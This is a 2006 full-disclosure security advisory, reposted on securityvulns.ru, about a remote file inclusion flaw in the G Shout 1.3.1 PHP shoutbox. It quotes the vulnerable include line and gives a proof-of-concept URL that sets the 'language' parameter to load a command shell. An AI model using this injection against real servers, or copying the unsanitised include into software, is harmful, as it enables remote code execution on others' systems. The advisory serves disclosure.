Computer Security

Security Advisory: G Shout 1.3.1 Version - Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Andys Chat 4.5 (action) Remote File Inclusion

  [Full-disclosure] Advisory: Authentication bypass in phpBannerExchange

  [Full-disclosure] Advisory: Unauthorized password recovery in phpBannerExchange

  Secunia Research: DeluxeBB SQL Injection and File Inclusion Vulnerabilities

From:SpC-x <spc-x_(at)_bsdmail.org>
Date:15.06.2006
Subject:G Shout 1.3.1 Version - Remote File Include Vulnerability

# SaVSaK.CoM | SpC-x - The_BeKiR |

# G Shout 1.3.1 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : G Shout

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include("config.php");
# include("./includes/functions.inc.php");
# include ("./languages/lang-".$language.".php");

# Vulnerable :

# http://www.victim.com/G Shout/shoutbox.php?language=Command-Shell
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru